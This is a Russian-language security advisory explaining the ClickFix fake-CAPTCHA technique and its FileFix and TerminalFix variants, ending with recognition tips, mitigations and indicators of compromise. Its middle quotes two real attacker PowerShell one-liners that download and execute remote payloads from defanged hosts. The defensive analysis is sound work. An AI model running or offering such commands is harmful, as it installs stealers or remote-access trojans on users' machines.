Метод социальной инженерии под названием ClickFix за последние пару лет получил стремительное распространение среди злоумышленников. Его ключевая особенность заключается в том, что жертве не нужно открывать вложение или скачивать подозрительный файл. Вместо этого пользователь сам выполняет действия, необходимые для заражения системы, часто не осознавая, что стал участником атаки.
Описание
Стандартная схема ClickFix начинается с демонстрации поддельного сообщения об ошибке или страницы CAPTCHA (теста для отличия человека от программы). Такая страница может быть размещена на фишинговом сайте, взломанном легитимном ресурсе, вредоносном рекламном объявлении или в отравленных результатах поиска. В фоновом режиме на устройство жертвы копируется вредоносная команда, после чего страница инструктирует пользователя нажать сочетание клавиш Win+R, вставить скопированную команду в окно "Выполнить" и нажать Enter. Команда обычно запускается через PowerShell или mshta - оба инструмента являются подписанными компонентами Microsoft, что затрудняет их обнаружение базовыми средствами защиты.
Цепочка атаки короткая, но эффективная. Жертва переходит на вредоносную веб-страницу, где видит всплывающее окно с просьбой подтвердить, что она человек, или исправить якобы возникшую ошибку. После нажатия кнопки страница копирует команду в буфер обмена, а затем выступает в роли поддельной техподдержки, подробно объясняя, что нужно нажать Win+R, вставить команду и нажать Enter. Пользователь выполняет инструкции, и запущенный через PowerShell скрипт загружает следующую стадию вредоносной нагрузки. Это может быть стилер (программа для кражи данных), лоадер (загрузчик других вредоносных программ) или троян удалённого доступа. Часто за одну атаку доставляется сразу несколько образцов.
Предоставленные данные о кампаниях ClickFix показывают, что команды приходят в виде обычного текста, который не фильтруется шлюзами безопасности, выполняются в контексте текущего сеанса пользователя и используют подписанные двоичные файлы Microsoft. Стандартное обучение персонала основам кибергигиены обычно не включает навык отказа от вставки команд в системные окна.
Один из распространённых примеров ClickFix - поддельная страница CAPTCHA, имитирующая процесс проверки Cloudflare. Злоумышленники создают страницу, внешне почти неотличимую от реальной, но после нажатия кнопки верификации страница не продолжает проверку, а просит пользователя нажать Win+R и вставить скопированную команду. Команда может выглядеть так:
| 1 | powershell -NoP -w h -ep bypass -c "$h='gasshopper'+'[.]sale';$n='1b3648d6.exe';$u='https://'+$h+'/api/index.php?a=grab';$f=$env:TEMP+'\'+$n;[Net.WebClient]::new().('Down'+'loadFile')($u,$f);ri($f+':Zone.Identifier')-EA 0;& $f" |
Эта команда запускает PowerShell в скрытом режиме с отключёнными ограничениями безопасности, загружает файл 1b3648d6.exe с удалённого сервера, удаляет метку загрузки из интернета (если она есть) и выполняет файл.
Хотя большинство атак ClickFix маскируются под Cloudflare, злоумышленники используют и другие бренды. Например, в одной из кампаний применялась поддельная капча от Google, копировавшая в буфер обмена такую команду:
| 1 | powershell -w h "iex(irm 'idverification-cdn[.]info/6c39ecea8db8e938' -UseBasicParsing)"; exit <#Verification ID: 6c39ecea8db8e938#> |
Эта команда также скачивает и выполняет код PowerShell напрямую.
Опасность ClickFix заключается в том, что пользователь невольно становится исполнителем атаки. Вместо подозрительного вложения или прямого скачивания файла вредоносная активность маскируется под рутинную проверку. Капчи действительно меняются, и пользователи привыкли видеть новые формы верификации, поэтому могут принять шаги ClickFix за очередную вариацию человеческой проверки.
Кроме классического варианта, существуют модификации. В варианте FileFix жертву просят открыть проводник Windows (Ctrl+E), затем перейти в адресную строку (Ctrl+L) и вставить туда команду. В адресной строке проводника можно выполнять PowerShell-команды, чем и пользуются атакующие. В варианте TerminalFix пользователя напрямую просят открыть PowerShell, ввести команду и выполнить её - без использования окна "Выполнить".
Для распознавания поддельной CAPTCHA следует запомнить несколько признаков. Настоящая капча предназначена для проверки человека в браузере и никогда не требует выхода за его пределы. Она не просит нажать Win+R, открыть окно "Выполнить", вставить команду, запустить PowerShell, Терминал или командную строку. Настоящая капча не копирует ничего в буфер обмена, не предлагает "ручную верификацию" вне браузера и не ведёт себя как страница технической поддержки. Если страница просит покинуть браузер и выполнить какие-либо действия на уровне операционной системы - это верный признак атаки.
Техника ClickFix продолжает набирать обороты, поскольку обходит традиционные меры защиты, ориентированные на обнаружение вредоносных файлов и ссылок. Единственный надёжный способ противодействия - повышение осведомлённости пользователей и чёткие корпоративные политики, запрещающие запуск команд из непроверенных источников вне браузера. Организациям рекомендуется внедрить блокировку выполнения PowerShell и mshta для обычных пользователей, а также настроить политики AppLocker или Windows Defender Application Control, чтобы ограничить запуск неподписанных скриптов.
Индикаторы компрометации
Domain
- ajantaappliances.com
- fearlesshomemaker.com
- imohoo.com.br
- keypharmacy.uk
- lifetimeeyecare.biz
- swanriverschool.org
- thekiss.gr
- unspanel.rs
URL
- https://www.einvoicesolutions.com/
- https://www.m-und-c-partners.de/